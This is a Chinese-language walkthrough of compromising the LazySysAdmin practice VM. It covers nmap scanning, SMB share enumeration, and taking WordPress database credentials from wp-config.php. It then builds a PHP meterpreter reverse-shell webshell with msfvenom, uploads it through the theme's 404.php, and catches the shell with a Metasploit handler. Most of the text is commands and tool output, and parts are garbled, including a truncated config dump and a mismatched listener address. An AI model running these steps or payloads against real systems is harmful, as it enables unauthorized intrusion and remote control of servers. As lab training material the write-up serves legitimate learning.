**
**
扫描开放服务:
root@kali:~# nmap -sV 192.168.1.109
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-10 10:39 CST
Nmap scan report for 192.168.1.109
Host is up (0.0024s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) //开启了smb服务
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
MAC Address: 00:0C:29:93:46:FE (VMware)
Service Info: Host: Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.29 seconds
root@kali:~# nmap -A -v -T4 192.168.1.109 //-A 所有信息 -v -T4 最大线程
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-10 10:44 CST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Initiating ARP Ping Scan at 10:44
Scanning 192.168.1.109 [1 port]
Completed ARP Ping Scan at 10:44, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:44
Completed Parallel DNS resolution of 1 host. at 10:44, 0.01s elapsed
Initiating SYN Stealth Scan at 10:44
Scanning 192.168.1.109 [1000 ports]
Discovered open port 139/tcp on 192.168.1.109
Discovered open port 22/tcp on 192.168.1.109
Discovered open port 445/tcp on 192.168.1.109
Discovered open port 3306/tcp on 192.168.1.109
Discovered open port 80/tcp on 192.168.1.109
Discovered open port 6667/tcp on 192.168.1.109
Completed SYN Stealth Scan at 10:44, 0.09s elapsed (1000 total ports)
Initiating Service scan at 10:44
Scanning 6 services on 192.168.1.109
Completed Service scan at 10:44, 11.02s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.109
NSE: Script scanning 192.168.1.109.
Initiating NSE at 10:44
Completed NSE at 10:44, 9.71s elapsed
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Nmap scan report for 192.168.1.109
Host is up (0.00040s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|_ 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.1.108
|_ error: Closing link: ([email protected]) [Client exited]
MAC Address: 00:0C:29:93:46:FE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.002 days (since Wed Jul 10 10:42:13 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown)
| Names:
| LAZYSYSADMIN<00> Flags:
| LAZYSYSADMIN<03> Flags:
| LAZYSYSADMIN<20> Flags:
| WORKGROUP<00> Flags:
|_ WORKGROUP<1e> Flags:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN
| Domain name:
| FQDN: lazysysadmin
|_ System time: 2019-07-10T12:44:25+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.40 ms 192.168.1.109
NSE: Script Post-scanning.
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Initiating NSE at 10:44
Completed NSE at 10:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.28 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.302KB)
查看靶场机器上的共享的文件夹和文件:
root@kali:~# smbclient -L 192.168.1.109 //
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers //可以看到smb服务上的文件
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server) //IPC表示空连接,相当于不需要密码账号就可以
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Server Comment
--------- -------
LAZYSYSADMIN Web server
Workgroup Master
--------- -------
WORKGROUP
继续探测文件夹:
root@kali:~# smbclient '\\192.168.1.109\print$' //‘\\IP\文件名字’ 注意要用单引号。
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
tree connect failed: NT_STATUS_ACCESS_DENIED
我们可以看到没有权限登陆
root@kali:~# smbclient '\\192.168.1.109\share$'
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
. D 0 Tue Aug 15 19:05:52 2017
.. D 0 Mon Aug 14 20:34:47 2017
wordpress D 0 Tue Aug 15 19:21:08 2017
Backnode_files D 0 Mon Aug 14 20:08:26 2017
wp D 0 Tue Aug 15 18:51:23 2017
deets.txt N 139 Mon Aug 14 20:20:05 2017
robots.txt N 92 Mon Aug 14 20:36:14 2017
todolist.txt N 79 Mon Aug 14 20:39:56 2017
apache D 0 Mon Aug 14 20:35:19 2017
index.html N 36072 Sun Aug 6 13:02:15 2017
info.php N 20 Tue Aug 15 18:55:19 2017
test D 0 Mon Aug 14 20:35:10 2017
old D 0 Mon Aug 14 20:35:13 2017
3029776 blocks of size 1024. 1456520 blocks available
smb: \> exit
root@kali:~# smbclient '\\192.168.1.109\IPc$'
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \* //没有权限查看IPc文件
smb: \> pwd
Current directory is \\192.168.1.109\IPc$\
smb: \>
查看share文件:
root@kali:~# smbclient '\\192.168.1.109\share$'
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
. D 0 Tue Aug 15 19:05:52 2017
.. D 0 Mon Aug 14 20:34:47 2017
wordpress D 0 Tue Aug 15 19:21:08 2017 //wordpass是一个目录
Backnode_files D 0 Mon Aug 14 20:08:26 2017
wp D 0 Tue Aug 15 18:51:23 2017
deets.txt N 139 Mon Aug 14 20:20:05 2017 //deet.txt 是一个文件
robots.txt N 92 Mon Aug 14 20:36:14 2017
todolist.txt N 79 Mon Aug 14 20:39:56 2017
apache D 0 Mon Aug 14 20:35:19 2017
index.html N 36072 Sun Aug 6 13:02:15 2017
info.php N 20 Tue Aug 15 18:55:19 2017
test D 0 Mon Aug 14 20:35:10 2017
old D 0 Mon Aug 14 20:35:13 2017
3029776 blocks of size 1024. 1456520 blocks available
smb: \> get deets.txt //下载文件,我们打开另一个终端查看文件看到password
getting file \deets.txt of size 139 as deets.txt (67.9 KiloBytes/sec) (average 67.9 KiloBytes/sec)
smb: \> cd wordpress\
smb: \wordpress\> ls
. D 0 Tue Aug 15 19:21:08 2017
.. D 0 Tue Aug 15 19:05:52 2017
wp-config-sample.php N 2853 Wed Dec 16 17:58:26 2015
wp-trackback.php N 4513 Sat Oct 15 03:39:28 2016
wp-admin D 0 Thu Aug 3 05:02:02 2017
wp-settings.php N 16200 Fri Apr 7 02:01:42 2017
wp-blog-header.php N 364 Sat Dec 19 19:20:28 2015
index.php N 418 Wed Sep 25 08:18:11 2013
wp-cron.php N 3286 Mon May 25 01:26:25 2015
wp-links-opml.php N 2422 Mon Nov 21 10:46:30 2016
readme.html N 7413 Mon Dec 12 16:01:39 2016
wp-signup.php N 29924 Tue Jan 24 19:08:42 2017
wp-content D 0 Mon Aug 21 18:07:27 2017
license.txt N 19935 Tue Jan 3 01:58:42 2017
wp-mail.php N 8048 Wed Jan 11 13:13:43 2017
wp-activate.php N 5447 Wed Sep 28 05:36:28 2016
.htaccess H 35 Tue Aug 15 19:40:13 2017
xmlrpc.php N 3065 Thu Sep 1 00:31:29 2016
wp-login.php N 34327 Sat May 13 01:12:46 2017
wp-load.php N 3301 Tue Oct 25 11:15:30 2016
wp-comments-post.php N 1627 Mon Aug 29 20:00:32 2016
wp-config.php N 3703 Mon Aug 21 17:25:14 2017 //可以看到wordpass的配置文件
wp-includes D 0 Thu Aug 3 05:02:03 2017
3029776 blocks of size 1024. 1456520 blocks available
smb: \wordpress\> get wp-config.php //下载终端文件
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (723.2 KiloBytes/sec) (average 536.0 KiloBytes/sec)
我们查看终端文件:
root@kali:~# cat wp-config.php
g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY', 'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY', 'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY', ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT', '(:^?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT', '=M_DRp%vGmijIhl%K!(v>:,*RRG:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');
;
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
我们可以看到数据库对应的用户名和密码:
TogieMYSQL12345^^
接着我们打开数据库(在namp扫描结果中的我们可以看到开放了对应的端口):
root@kali:~# mysql -h 192.168.1.109 -u admin -p
Enter password:
ERROR 1130 (HY000): Host '192.168.1.108' is not allowed to connect to this MySQL server
结果很遗憾我们并没有登陆进去,这时候我们发现服务器开放了对应的ssh,我们尝试以下登陆ssh:
结果登陆失败了。
此时我们针对SMB协议远程溢出漏洞进行分析:
searchsploit samba 版本号查看是否具有远程溢出漏洞
root@kali:~# searchsploit Samba Samba smbd 3.X - 4.X
----------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
----------------------------------------------- ----------------------------------
----------------------------------------------- ----------------------------------
root@kali:~# searchsploit Samba Samba 4.3.11-Ubuntu
----------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
----------------------------------------------- ----------------------------------
----------------------------------------------- ----------------------------------
root@kali:~#
我们看到都没有远程溢出漏洞
mysql ssh 都没有发现什么,这时候我们寻找其他的出口,比如80端口的http协议:
首先进行目录文件探测:
root@kali:~# dirb http://192.168.1.109/
在探测的过程中我们发现有一个phpadmin目录,输入我们上面找到的账户、密码我们登陆,竟然登陆进去了。
但是我们进去之后,查看各种数据库、各种表依旧没有发现什么有用的信息,因为我们在看一下别的目录:
http://192.168.1.109/wordpress/wp-admin 我们打开这个目录,输入密码账户
我们登陆进网站后台之后,我们就可以上传一句话木马,拿到权限。
**
**
webshell的制作:
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
root@kali:~# gedit webshell.php //制作php脚本
打开metasploit,设置监听:
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.22-dev ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler //使用模块
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options //设置参数
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set lhost 192.168.1.109
lhost => 192.168.1.109
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.109 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run //开始运行监听
[-] Handler failed to bind to 192.168.1.109:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
以上步骤就是打开Meterpreter模板,设置payload,来监听端口(此时我们已经将反弹shell的脚本上传至对应位置,只需执行反弹shell脚本)。
上传webshell:
我们在网址中打开webshell地址,这里要注意对应的url名:
http://192.168.1.109/wordpress/wp-content/themes/twentyfifteen/404.php
进入命令行模式:
python -c "import pty;pty.spawn('/bin/bash')" //优化终端记住 /bin/bash要用单引号
补充:
1.Linux /etc/passwd内容解释
2.sudo --l 命令的意思是: -l 列出目前用户可执行与无法执行的指令。
3.在metasploit模块下进入反弹的shell用shell命令。
4.切换到普通用户:su togie (su 用户名称)此时输入所切换到的用户的密码即togie
5.关于su、sudo、sudo -i的区别
6.sudo su 用来提升命令权限,可以直接进入到root命令。
7.use exploit/multi/handler
8.set payload php/meterpreter/reverse_tcp
9.msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
10.关于8、9这两个东西的解释(暂且叫着两个东西)
11.nmap -A -v -T4 192.168.1.109
利用多线程(T4),扫描全部(A)详细(v)信息
12.nmap -sV 192.168.1.109
-sV 探测端口的服务类型/具体版本等信息
13.smbclient -L 192.168.1.109
-L:显示服务器端所分享出来的所有资源。smbclient命令属于samba套件,它提供一种命令行使用交互式方式访问samba服务器的共享资源。具体参数
14.smbclient '\\192.168.1.109\print$'
//‘\IP\文件名字’ 注意要用单引号。
15.get deets.txt
在smb中下载文件。